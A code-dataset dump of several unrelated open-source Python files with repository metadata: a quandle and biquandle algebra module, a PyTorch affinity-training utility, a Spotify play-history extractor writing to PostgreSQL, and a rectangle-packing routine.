{
"api_name": "sklearn.cross_validation",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "sklearn.linear_model.LogisticRegression",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 115,
"usage_type": "call"
}
] |
20086331044
|
"""
Contains classes Quandle, Biquandle, Identity_Quandle,
Alexander_Quandle, and Singquandle.
FIXME:
- Nothing for now.
TODO:
- If X is a rack with operation a*b, then it is a birack if we
define a**b as the identity a**b == a. Thus biquandle matrix2
should be optional.
- Does the above apply to singquandles/singracks?
- homomorphism methods.
"""
import numpy as np
from pyknots.modules.magmas import Magma
from pyknots.modules.groups import Group
from pyknots.modules.utils import issquare, applymorphism
import json
import os
__all__ = ['Quandle', 'Biquandle', 'Singquandle',
'Alexander_Quandle', 'Conj_Quandle', 'Trivial_Quandle']
class Quandle(Magma):
"""Instantiate a quandle object by passing Quandle() a matrix, a
string representation of the RIG index, or a numpy array.
"""
def __init__(self, matrix):
if type(matrix) is str:
dirname = os.path.dirname(os.path.realpath(__file__))
path = os.path.join(os.path.dirname(dirname), 'data', 'RIG_quandles.json')
try:
with open(path, 'r') as fp:
matrix = json.load(fp)[matrix]
self.__init__(matrix)
except KeyError:
raise TypeError('Input %s not a RIG quandle.' % (matrix))
else:
super().__init__(matrix)
def __str__(self):
return str(self.array)
def as_biquandle(self):
""" Generate identity matrix and return biquandle class object."""
M1 = self.array
M2 = Trivial_Quandle(self.order, self.index).array
B = Biquandle(M1, M2)
return B
def inverse_quandle(self):
M = self.array
n = self.order
new_M = np.zeros((n, n), dtype=int)
for i in range(n):
for j in range(n):
k = M[i,j]
new_M[k,j] = i
return Quandle(new_M)
def is_rack(self):
""" A rack is a set with 2 axioms: for a, b, c in X,
1) a*b is a bijection.
2) (a*b)*c == (a*c)*(b*c).
"""
M = self.array
ind = self.index
for i in range(self.order):
col = []
for j in range(self.order):
for k in range(self.order):
if M[M[i,j]-ind,k] != M[M[i,k]-ind,M[j,k]-ind]:
return False
col.append(M[j,i])
for c in range(len(col)):
if not c+ind in col:
return False
return True
def is_quandle(self):
""" A quandle is a rack that satisfies the third axiom that for
all a in X, a*a == a.
"""
M = self.array
ind = self.index
if not self.is_rack():
return False
for i in range(self.order):
if M[i,i] != i+ind:
return False
return True
def is_biquandle(self):
return False
def is_singquandle(self):
return False
def is_kei(self):
if self.is_quandle() and self.is_involutory():
return True
return False
def is_trivial(self):
""" A quandle is trivial if for all a, b in X, a*b == a."""
M = self.array
for i in range(self.order):
for j in range(self.order):
if M[i,j] != i:
return False
return True
def is_involutory(self):
""" A quandle is involutory if for all a, b in X, a*(a*b) == b."""
M = self.array
for i in range(self.order):
for j in range(self.order):
if M[i,M[i,j]] != j:
return False
return True
def is_dihedral(self):
""" If for all a, b in X, a*b == 2*b-a then it is dihedral.
Equivalent to isomorphism to Alexander_Quandle(p, -1)
"""
M = self.array
ind = self.index
p = self.order
for i in range(self.order):
for j in range(self.order):
if M[i,j] != ((2*(j) - (i)) % p)+ind:
return False
return True
def is_medial(self):
""" Equivalent to abelian quandle. If X satisfies the property that for
any a, b, c, d in Q, (a*b)*(c*d) == (a*c)*(b*d) it is medial.
"""
M = self.array
ind = self.index
for i in range(self.order):
for j in range(self.order):
for m in range(self.order):
for n in range(self.order):
if M[M[i,j]-ind,M[m,n]-ind] != M[M[i,m]-ind,M[j,n]-ind]:
return False
return True
class Biquandle(object):
""" Instantiate a biquandle object by passing Biquandle() a pair of
matrices, a string representation of the RIG index, or a
numpy array.
"""
def __init__(self, matrix1, matrix2=None):
if matrix2 is None:
M1 = Quandle(matrix1)
M2 = Identity_Quandle(M1.order, M1.index)
self.__init__(M1.array, M2.array)
else:
self.quandle1, self.quandle2 = Quandle(matrix1), Quandle(matrix2)
self.array1, self.array2 = np.array(matrix1), np.array(matrix2)
self.order = len(matrix1[0])
self.index = self._index()
def __str__(self):
return str(self.array1)+str(self.array2)
def _index(self):
""" Verify that indices of input match."""
ind1, ind2 = np.amin(self.array1), np.amin(self.array2)
if ind1 != ind2:
raise IndexError('%s, %s have non-matching indices.' % (self.array1, self.array2))
return ind1
def is_birack(self):
""" A birack is a set with 4 axioms: for a, b, c in X,
1) a*b, a**b is a bijection.
2) (a**b)**(c**b) == (a**c)**(b*c).
3) (a*b)*(c*b) == (a*c)*(b**c)
4) (a*b)**(c*b) == (a**c)*(b**c)
"""
M1, M2 = self.array1, self.array2
ind = self.index
if not self.is_invertible():
return False
for a in range(self.order):
for b in range(self.order):
for c in range(self.order):
if M2[M2[a,b]-ind,M2[c,b]-ind] != M2[M2[a,c]-ind,M1[b,c]-ind]:
return False
if M1[M1[a,b]-ind,M1[c,b]-ind] != M1[M1[a,c]-ind,M2[b,c]-ind]:
return False
if M2[M1[a,b]-ind,M1[c,b]-ind] != M1[M2[a,c]-ind,M2[b,c]-ind]:
return False
return True
def is_biquandle(self):
""" A biquandle is a birack such that for all a in X, there
exists x such that: x*a == x <==> a**x == a"""
M1, M2 = self.array1, self.array2
if not self.is_birack():
return False
for i in range(self.order):
for j in range(self.order):
if M1[i,j] == i and M2[j,i] != j:
return False
return True
def is_singquandle(self):
return False
def is_invertible(self):
if self.quandle1.is_left_invertible():
if self.quandle2.is_left_invertible():
return True
return False
def check_wada(self):
M1, M2 = self.array1, self.array2
for a in range(self.order):
for b in range(self.order):
for c in range(self.order):
if M1[M1[a,b],M1[M2[a,b],c]] != M1[a,M1[b,c]]:
return False
if M2[M1[a,b],M1[M2[a,b],c]] != M1[M2[a,M1[b,c]],M2[b,c]]:
return False
if M2[M2[a,b],c] != M2[M2[a,M1[b,c]],M2[b,c]]:
return False
return True
class Singquandle(object):
""" Instantiate a singquandle object by passing Singquandle() three
matrices (denoting Cayley tables for *, R1, and R2), a string
representation of the RIG index, or a numpy array.
(Only matrices supported)
"""
def __init__(self, matrix1, matrix2, matrix3):
self.quandle1, self.quandle2 = Quandle(matrix1), Quandle(matrix2)
self.quandle3 = Quandle(matrix3)
self.array1, self.array2 = np.array(matrix1), np.array(matrix2)
self.array3 = np.array(matrix3)
self.order = len(matrix1[0])
self.index = self._index()
def __str__(self):
return str(self.array1)+str(self.array2)+str(self.array3)
def _index(self):
""" Verify that indices of input match."""
ind1, ind2, ind3 = np.amin(self.array1), np.amin(self.array2), np.amin(self.array3)
if ind1 != ind2 != ind3:
raise IndexError('%s, %s, %s have non-matching indices.' % (self.array1, self.array2, self.array3))
return ind1
def is_invertible(self):
""" Check whether * is an invertible operation."""
if not self.quandle1.is_left_invertible():
return False
return True
"""
def check_identity(self):
R1(x,y) = R2(y,x)*x, R2(x,y) = R1(y,x)*y.
M1, M2, M3 = self.array1, self.array2, self.array3
ind = self.index
for a in range(self.order):
for b in range(self.order):
if M2[a,b] != M1[M3[b,a]-ind,a]:
return False
if M3[a,b] != M1[M2[b,a]-ind,b]:
return False
return True
"""
def is_singquandle(self):
""" Check if the object is a singquandle."""
if self.is_nonoriented_singquandle() or self.is_oriented_singquandle():
return True
return False
def is_nonoriented_singquandle(self):
""" Check if the singquandle satisfies the axioms of a nonoriented
singquandle.
"""
M1, M2, M3 = self.array1, self.array2, self.array3
ind = self.index
if not self.is_invertible():
return False
for a in range(self.order):
for b in range(self.order):
if M3[a,b] != M2[b,M1[a,b]-ind]:
return False
if M3[b,M1[a,b]-ind] != M1[M2[a,b]-ind,M3[a,b]-ind]:
return False
if M2[a,b] != M3[M1[b,a]-ind,a]:
return False
if M2[M1[b,a]-ind,a] != M1[M3[a,b]-ind,M2[a,b]-ind]:
return False
for c in range(self.order):
if M1[M1[b,c]-ind,M3[a,c]-ind] != M1[M1[b,a]-ind,M2[a,c]-ind]:
return False
if M1[M2[a,b]-ind,c] != M2[M1[a,c]-ind,M1[b,c]-ind]:
return False
if M1[M3[a,b]-ind,c] != M3[M1[a,c]-ind,M1[b,c]-ind]:
return False
return True
def is_oriented_singquandle(self):
""" Check if the singquandle satisfies the axioms of an oriented
singquandle.
"""
M1, M2, M3 = self.array1, self.array2, self.array3
n, ind = self.order, self.index
inv = self.quandle1.inverse_quandle().array
if not self.is_invertible():
return False
for x in range(n):
for y in range(n):
for z in range(n):
if M1[M2[inv[x,y],z],y] != M2[x,M1[z,y]]:
return False
if M3[inv[x,y],z] != inv[M3[x,M1[z,y]], y]:
return False
if M1[inv[y,M2[x,z]],x] != inv[M1[y,M3[x,z]], z]:
return False
if M3[x,y] != M2[y,M1[x,y]]:
return False
if M1[M2[x,y], M3[x,y]] != M3[y, M1[x,y]]:
return False
return True
class Alexander_Quandle(Quandle):
""" Returns quandle generated by Alexander module Z_p/((t**b)-a).
Setting exponent b not supported.
"""
def __init__(self, p, a=-1, b=None):
M = np.zeros((p, p), dtype=int)
for i in range(p):
for j in range(p):
M[i,j] = (a*i + (1 - a)*j) % p
super().__init__(M.tolist())
class Conj_Quandle(Quandle):
""" Returns quandle generated by the group cayley table with automorphism f. Pass
f as a permutation in the form (1, 2, 3, ...). Then f maps index(i) to i.
Quandle is given by conjugation operation x*y = f(y)^{-1}f(x)f(y).
"""
def __init__(self, matrix, *args):
n = len(matrix[0])
M = np.zeros((n, n), dtype=int)
for arg in args:
if isinstance(arg, tuple):
matrix = applymorphism(matrix, arg)
G = Group(matrix)
m = G.array
for i in range(n):
for j in range(n):
M[i,j] = m[m[G.inverse(j), i], j]
super().__init__(M)
class Trivial_Quandle(Quandle):
""" Returns a trivial quandle such that for all a, b in X,
a*b == a. Optional index for non-0-indexed quandles.
"""
def __init__(self, dim, index=0, flip=False):
ind = index
M = []
if not flip:
for i in range(dim):
row = [i+ind for j in range(ind, dim+ind)]
M.append(row)
else:
for i in range(dim):
row = [j+ind for j in range(ind, dim+ind)]
M.append(row)
super().__init__(M)
|
RafaelMri/Pyknots
|
modules/quandles.py
|
quandles.py
|
py
| 13,410 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "pyknots.modules.magmas.Magma",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "os.path.realpath",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "numpy.amin",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 354,
"usage_type": "call"
},
{
"api_name": "pyknots.modules.utils.applymorphism",
"line_number": 357,
"usage_type": "call"
},
{
"api_name": "pyknots.modules.groups.Group",
"line_number": 358,
"usage_type": "call"
}
] |
648181227
|
import numpy as np
import torch
from affogato.affinities import compute_affinities
from torchvision.utils import make_grid
from inferno.extensions.criteria import SorensenDiceLoss
class ConcatDataset(torch.utils.data.Dataset):
def __init__(self, *datasets):
self.datasets = datasets
self.lens = [len(ds) for ds in self.datasets]
self.start_idx = np.cumsum(self.lens)
self.start_idx[-1] = 0
self.start_idx = np.roll(self.start_idx, 1)
def __len__(self):
return sum(self.lens)
def __getitem__(self, index):
ds_index = np.where(index - self.start_idx >= 0)[0][-1]
item_index = index - self.start_idx[ds_index]
return self.datasets[ds_index][item_index]
class DefaultDataset(torch.utils.data.Dataset):
""" Simple default dataset for generating affinities
from segmentation and mask.
"""
patch_shape = [512, 512] # TODO expose this and other parameters
def to_affinities(self, seg, mask):
seg[~mask] = 0
affs, aff_mask = compute_affinities(seg, self.offsets, have_ignore_label=True)
aff_mask = aff_mask.astype('bool')
affs = 1. - affs
mask_transition, aff_mask2 = compute_affinities(mask, self.offsets)
mask_transition[~aff_mask2.astype('bool')] = 1
aff_mask[~mask_transition.astype('bool')] = True
return affs, aff_mask
@staticmethod
def estimate_n_samples(shape, patch_shape):
# we estimate the number of samples by tiling shape with patch_shape
crops_per_dim = [sh / float(cs) for sh, cs in zip(shape, patch_shape)]
return int(np.prod(crops_per_dim))
def __init__(self, raw, seg, mask_ids, offsets, transforms=None):
self.raw = raw
self.seg = seg
self.mask_ids = mask_ids
self.offsets = offsets
self.transforms = transforms
self.n_samples = self.estimate_n_samples(self.raw.shape, self.patch_shape)
def __getitem__(self, index):
# TODO sample so that we are biased towards the mask
def sample_raw_seg_mask():
offset = [np.random.randint(0, sh - csh) if sh > csh else 0
for sh, csh in zip(self.raw.shape, self.patch_shape)]
bb = tuple(slice(off, off + csh) for off, csh in zip(offset, self.patch_shape))
raw = self.raw[bb]
seg = self.seg[bb]
if self.transforms is not None:
raw, seg = self.transforms(raw, seg)
raw, seg = raw.copy(), seg.copy()
mask = np.isin(seg, self.mask_ids)
return raw, seg, mask
raw, seg, mask = sample_raw_seg_mask()
# TODO ensure that we have some in-mask area
# # some arbitrary but very small pixel threshold
# while mask.sum() < 25:
# raw, seg, mask = sample_raw_seg_mask()
# add channel dim
raw = raw[None]
# make affs and aff_mask
affs, aff_mask = self.to_affinities(seg, mask)
return raw, affs, aff_mask
def __len__(self):
return self.n_samples
class MaskedLoss(torch.nn.Module):
def __init__(self):
super().__init__()
self.criterion = SorensenDiceLoss()
def forward(self, pred, y, mask):
mask.requires_grad = False
masked_prediction = pred * mask
loss = self.criterion(masked_prediction, y)
return loss
def default_training(proc_id, net, ds,
pipe, device, step):
loader = torch.utils.data.DataLoader(ds, batch_size=1, num_workers=2)
p_out, p_in = pipe
optimizer = torch.optim.Adam(net.parameters(), lr=1e-4)
loss = MaskedLoss()
loss = loss.to(device)
logger = torch.utils.tensorboard.SummaryWriter('./runs/imws')
add_gradients = True
log_frequency = 10
net.train()
while True:
if p_out.poll():
if not p_out.recv():
p_in.send(step)
break
for x, y, mask in loader:
x = x.to(device)
y, mask = y.to(device), mask.to(device)
optimizer.zero_grad()
pred = net(x)
pred.retain_grad()
loss_val = loss(pred, y, mask)
loss_val.backward()
optimizer.step()
logger.add_scalar("loss", loss_val.item(), step)
step += 1
if step % log_frequency == 0:
print("Background training process iteration", step)
x = x[0].detach().cpu()
logger.add_image('input', x, step)
y = y[0].detach().cpu()
if add_gradients:
grads = pred.grad[0].detach().cpu()
grads -= grads.min()
grads /= grads.max()
pred = torch.clamp(pred[0].detach().cpu(), 0.001, 0.999)
tandp = [target.unsqueeze(0) for target in y]
nrow = len(tandp)
tandp.extend([p.unsqueeze(0) for p in pred])
if add_gradients:
tandp.extend([grad.unsqueeze(0) for grad in grads])
tandp = make_grid(tandp, nrow=nrow)
logger.add_image('target_and_prediction', tandp, step)
# for debugging
# return x, y, pred, grads
|
constantinpape/affogato
|
src/python/module/affogato/interactive/napari/train_utils.py
|
train_utils.py
|
py
| 5,323 |
python
|
en
|
code
| 9 |
github-code
|
6
|
[
{
"api_name": "torch.utils",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "numpy.cumsum",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.roll",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.where",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "affogato.affinities.compute_affinities",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "affogato.affinities.compute_affinities",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.prod",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "numpy.random.randint",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 62,
"usage_type": "attribute"
},
{
"api_name": "numpy.isin",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 96,
"usage_type": "attribute"
},
{
"api_name": "inferno.extensions.criteria.SorensenDiceLoss",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 110,
"usage_type": "attribute"
},
{
"api_name": "torch.optim.Adam",
"line_number": 114,
"usage_type": "call"
},
{
"api_name": "torch.optim",
"line_number": 114,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 118,
"usage_type": "call"
},
{
"api_name": "torch.utils",
"line_number": 118,
"usage_type": "attribute"
},
{
"api_name": "torch.clamp",
"line_number": 157,
"usage_type": "call"
},
{
"api_name": "torchvision.utils.make_grid",
"line_number": 164,
"usage_type": "call"
}
] |
26298956035
|
import argparse
from dateutil import tz
from datetime import datetime
from spotipy import Spotify
import spotipy.util
from models import Play, Track, Album, Artist, PostgreSQLConnection
import settings
def set_timezone_to_datetime(datetime_to_set, timezone):
return datetime_to_set.replace(tzinfo=tz.gettz(timezone))
def convert_played_at_from_response_to_datetime(played_at):
try:
return datetime.strptime(played_at, '%Y-%m-%dT%H:%M:%S.%fZ')
except:
# For the single moment where the played at time hits a full second
return datetime.strptime(played_at, '%Y-%m-%dT%H:%M:%SZ')
def convert_datetime_from_timezone_to_timezone(datetime_to_convert, from_tz_code, to_tz_code):
from_tz = tz.gettz(from_tz_code)
to_tz = tz.gettz(to_tz_code)
datetime_to_convert = datetime_to_convert.replace(tzinfo=from_tz)
converted_datetime = datetime_to_convert.astimezone(to_tz)
return converted_datetime
class SpotifyConnection(object):
def __init__(self, user_data):
self.user_name = user_data['user_name']
token = spotipy.util.prompt_for_user_token(self.user_name,
scope='user-read-recently-played',
client_id=user_data['client_id'],
client_secret=user_data['client_secret'],
redirect_uri=user_data['redirect_uri'])
self.client = Spotify(auth=token)
self.db = self.init_db()
def init_db(self):
return PostgreSQLConnection()
def get_artist(self, artist_id):
artist = self.db.session.query(Artist).get(artist_id)
if artist:
return artist
else:
artist_response = self.client.artist(artist_id)
artist = Artist()
artist.artist_id = artist_id
artist.artist_data = artist_response
self.db.save_instance(artist)
print("> Artist {} was not in database.".format(artist.artist_data['name']))
return self.db.session.query(Artist).get(artist_id)
def get_album(self, album_id):
album = self.db.session.query(Album).get(album_id)
if album:
return album
else:
album_response = self.client.album(album_id)
album = Album()
album.album_data = album_response
album.album_id = album_response['id']
# Artists
for album_artist_response in album_response['artists']:
album.artists.append(self.get_artist(album_artist_response['id']))
self.db.save_instance(album)
print("> Album {} was not in database.".format(album.album_data['name']))
return self.db.session.query(Album).get(album_id)
def get_track(self, track_id):
track = self.db.session.query(Track).get(track_id)
if track:
return track
else:
response = self.client.track(track_id)
track = Track()
track.track_id = track_id
track.track_data = response
# Album
track.album = self.get_album(response['album']['id'])
# Artists
for artist_response in response['artists']:
track.artists.append(self.get_artist(artist_response['id']))
# Audio feature
audio_feature_response = self.client.audio_features(track_id)[0]
if audio_feature_response: # Some tracks do not have audio features
track.audio_feature_data = audio_feature_response
print("> Track {} was not in database.".format(track.track_data['name']))
self.db.save_instance(track)
return self.db.session.query(Track).get(track_id)
def get_play_from_played_at_utc_and_track_id(self, played_at_utc, track_id):
played_at_utc = convert_played_at_from_response_to_datetime(played_at_utc)
played_at_utc = set_timezone_to_datetime(played_at_utc, timezone='UTC')
played_at_cet = convert_datetime_from_timezone_to_timezone(played_at_utc,
from_tz_code='UTC',
to_tz_code='CET')
# Play
play = Play()
play.user_name = self.user_name
play.played_at_utc_timestamp = played_at_utc.timestamp() * 1000
play.played_at_utc = played_at_utc
play.played_at_cet = played_at_cet
play.day = played_at_cet.day
play.month = played_at_cet.month
play.year = played_at_cet.year
play.hour = played_at_cet.hour
play.minute = played_at_cet.minute
play.second = played_at_cet.second
play.day_of_week = played_at_cet.weekday()
play.week_of_year = played_at_cet.date().isocalendar()[1]
# Track
track = self.get_track(track_id)
play.track = track
play.track_id = track_id
return play
def _get_play_tuples_from_response(self, response):
plays = []
for item in response['items']:
play_tuple = (item['played_at'], item['track']['id'])
plays.append(play_tuple)
return plays
def _get_play_tuples(self, limit=50, after=None):
play_tuples = []
response = self.client._get('me/player/recently-played', after=after, limit=limit)
play_tuples.extend(self._get_play_tuples_from_response(response))
while response and 'next' in response:
response = self.client.next(response)
if response:
play_tuples.extend(self._get_play_tuples_from_response(response))
return play_tuples
def extract_plays(self):
print("* Extracting latest plays of {}.".format(self.user_name))
play_tuples = self._get_play_tuples()
for played_at, track_id in play_tuples:
play = self.get_play_from_played_at_utc_and_track_id(played_at, track_id)
self.db.save_play(play)
class HoergewohnheitenManager(object):
def __init__(self, spotify_user_data):
self.spotify = SpotifyConnection(user_data=spotify_user_data)
def process_hoergewohnheiten(self):
self.spotify.extract_plays()
def process_hoergewohnheiten(user_name):
print("***", user_name, "***")
user_data = settings.SPOTIFY_USERS[user_name]
mgr = HoergewohnheitenManager(user_data)
mgr.process_hoergewohnheiten()
if __name__ == '__main__':
print('''
_ ___ ____ ___ __ ____ _ ___ _ _ _ ____ _ _____ ____ _
| |_| / / \ | |_ | |_) / /`_ | |_ \ \ // / \ | |_| | |\ | | |_| | |_ | | | | | |_ | |\ |
|_| | \_\_/ |_|__ |_| \ \_\_/ |_|__ \_\/\/ \_\_/ |_| | |_| \| |_| | |_|__ |_| |_| |_|__ |_| \|
''')
print("Started at {}.".format(datetime.now()))
# Argparse
parser = argparse.ArgumentParser(description='Hoergewohnheiten')
parser.add_argument('-u', dest='user_name')
args = parser.parse_args()
if args.user_name:
process_hoergewohnheiten(args.user_name)
else:
for user_name in settings.SPOTIFY_USERS:
process_hoergewohnheiten(user_name)
print("Finished at {}.".format(datetime.now()))
|
mymindwentblvnk/hoergewohnheiten
|
extract/main.py
|
main.py
|
py
| 7,345 |
python
|
en
|
code
| 16 |
github-code
|
6
|
[
{
"api_name": "dateutil.tz.gettz",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "dateutil.tz.gettz",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "dateutil.tz.gettz",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "dateutil.tz",
"line_number": 27,
"usage_type": "name"
},
{
"api_name": "spotipy.util.prompt_for_user_token",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "spotipy.util",
"line_number": 38,
"usage_type": "attribute"
},
{
"api_name": "spotipy.Spotify",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "models.PostgreSQLConnection",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "models.Artist",
"line_number": 50,
"usage_type": "argument"
},
{
"api_name": "models.Artist",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "models.Artist",
"line_number": 60,
"usage_type": "argument"
},
{
"api_name": "models.Album",
"line_number": 63,
"usage_type": "argument"
},
{
"api_name": "models.Album",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "models.Album",
"line_number": 76,
"usage_type": "argument"
},
{
"api_name": "models.Track",
"line_number": 79,
"usage_type": "argument"
},
{
"api_name": "models.Track",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "models.Track",
"line_number": 99,
"usage_type": "argument"
},
{
"api_name": "models.Play",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "settings.SPOTIFY_USERS",
"line_number": 166,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 178,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 178,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 181,
"usage_type": "call"
},
{
"api_name": "settings.SPOTIFY_USERS",
"line_number": 188,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime.now",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 191,
"usage_type": "name"
}
] |
17333008494
|
import collections
class Rectangle():
def __init__(self, w, h, placed=None, free_wh=None):
self.wh = w, h
self.placed = placed or []
self.free_wh = free_wh or (0,0)
@property
def w(self):
return self.wh[0]
@property
def h(self):
return self.wh[1]
def transposed(self):
return Rectangle(self.h, self.w,
[r.transposed() for r in self.placed],
(self.free_wh[1], self.free_wh[0]),
)
@staticmethod
def placed_build(W, H, rect):
# build rectangle of size (W, H) with placed rectangle rect
if not W or not H:
return
w, h = rect.wh
if (W, H) == (w, h):
return Rectangle(W, H, [rect])
elif (W, H) == (h, w):
return Rectangle(W, H, [rect.transposed()])
H_h = H - h, W >= w
W_w = W - w, H >= h
H_w = H - w, W >= h
W_h = W - h, H >= w
cases = [H_h, W_w, H_w, W_h]
residue = [c[0] for c in cases if c[1] and c[0] >= 0]
if not residue:
return None
min_size = min(residue)
if H_h[0] == min_size and H_h[1]:
placed_r = Rectangle(w, H,
[rect],
(w, H - h))
free_wh = (W - w, H)
elif W_w[0] == min_size and W_w[1]:
placed_r = Rectangle(W, h,
[rect],
(W - w, h))
free_wh = (W, H - h)
elif H_w[0] == min_size and H_w[1]:
placed_r = Rectangle(h, H,
[rect.transposed()],
(h, H - w))
free_wh = (W - h, H)
elif W_h[0] == min_size and W_h[1]:
placed_r = Rectangle(W, w,
[rect.transposed()],
(W - h, w))
free_wh = (W, H - w)
else:
assert False, 'impossible'
out = Rectangle(W, H, [placed_r], free_wh)
return out
def place(self, rect):
W, H = self.free_wh
r = Rectangle.placed_build(W, H, rect)
if not r:
return False
self.placed.append(r.placed[0])
self.free_wh = r.free_wh
#print(f'place {rect.wh}: free {W,H} -> {self.free_wh}')
return True
@staticmethod
def concat(rects, by='w'):
w = list(map(lambda r : r.w, rects))
h = list(map(lambda r : r.h, rects))
if 'w' == by:
max_w = max(w)
placed_r = [
Rectangle.placed_build(max_w, r.h, r)
for r in rects
]
out = Rectangle(max_w, sum(h), placed_r)
else:
max_h = max(h)
placed_r = [
Rectangle.placed_build(r.w, max_h, r)
for r in rects
]
out = Rectangle(sum(w), max_h, placed_r)
return out
@staticmethod
def min_concat(W, H, rect1, rect2):
rect2T = Rectangle(rect2.h, rect2.w, rect2.placed, rect2.free_wh)
concat_cases = [
Rectangle.concat([rect1, rect2], by='w'),
Rectangle.concat([rect1, rect2], by='h'),
Rectangle.concat([rect1, rect2T], by='w'),
Rectangle.concat([rect1, rect2T], by='h'),
]
if W < H:
W, H = H, W
concat_cases = [r for r in concat_cases if max(r.wh) <= W and min(r.wh) <= H]
if not concat_cases:
return
return min(concat_cases, key=lambda r : r.free_square)
@property
def square(self):
return self.w * self.h
@property
def free_square(self):
out = self.free_wh[0] * self.free_wh[1]
for r in self.placed:
out += r.free_square
return out
def free_print(self):
if self.free_wh[0] and self.free_wh[1]:
print(self.free_wh)
for r in self.placed:
r.free_print()
@property
def fullness(self):
return (1 - self.free_square / self.square) * 100
def __repr__(self):
return f'Rectangle(w={self.w}, h={self.h}, childs={len(self.placed)}, free_wh={self.free_wh}, fullness={self.fullness}%)'
def equal_side_concat_step(rects, W, H, order='descending'):
w = list(map(lambda r : r.w, rects))
h = list(map(lambda r : r.h, rects))
side_cnt = collections.Counter([s for s in w + h if s <= max(W, H)])
side_repeats = [ side
for side, cnt in side_cnt.most_common()
if cnt > 1
]
side_repeats.sort(reverse=('descending' == order))
single_rects = list(rects)
side_to_rects = {}
for side in side_repeats:
side_to_rects[side] = [r for r in single_rects
if side in r.wh]
single_rects = [r for r in single_rects
if side not in r.wh]
# TODO: Если прямоугольник совпадает каждой стороной с другими -> варианты по какой стороне объединять
concat_rects = []
for side, side_rects in side_to_rects.items():
if 1 == len(side_rects):
single_rects.append(side_rects[0])
continue
for r in side_rects:
if side != r.w:
r.wh = r.h, r.w
# TODO: 1d упаковка вдоль H или W
# далее идет упаковка вдоль максимальной возможной стороны
side_rects.sort(key=lambda r : r.h, reverse=True)
concat_side = max(H, W) if side <= min(H, W) else min(H, W)
while side_rects:
rects_for_concat = []
rest_rects = []
sum_h = 0
for r in side_rects:
if sum_h + r.h <= concat_side:
rects_for_concat.append(r)
sum_h += r.h
else:
rest_rects.append(r)
if len(rects_for_concat) == 1:
single_rects.append(rects_for_concat[0])
elif len(rects_for_concat) > 1:
concat_rects.append(Rectangle.concat(rects_for_concat, by='w'))
else:
single_rects.extend(rest_rects)
break
#assert False, f'side_rects={side_rects}, rest_rects={rest_rects}, max_h={max_h}'
side_rects = rest_rects
return single_rects, concat_rects
def exact_concat(rects, W, H):
merge_rects = list(rects)
while True:
single_rects, concat_rects = equal_side_concat_step(merge_rects, W, H, order='descending')
#print(f'single_rects={single_rects} \n concat_rects={concat_rects} \n')
merge_rects = single_rects + concat_rects
if not concat_rects:
break
while True:
single_rects, concat_rects = equal_side_concat_step(merge_rects, W, H, order='ascending')
merge_rects = single_rects + concat_rects
if not concat_rects:
break
return merge_rects
def pallet_exact_side_placement(rects, pallet, side='max'):
W, H = pallet.free_wh
side = max(W, H) if 'max' == side else min (W, H)
rest_rects = []
for r in rects:
if side in r.wh:
if pallet.place(r):
continue
rest_rects.append(r)
return rest_rects
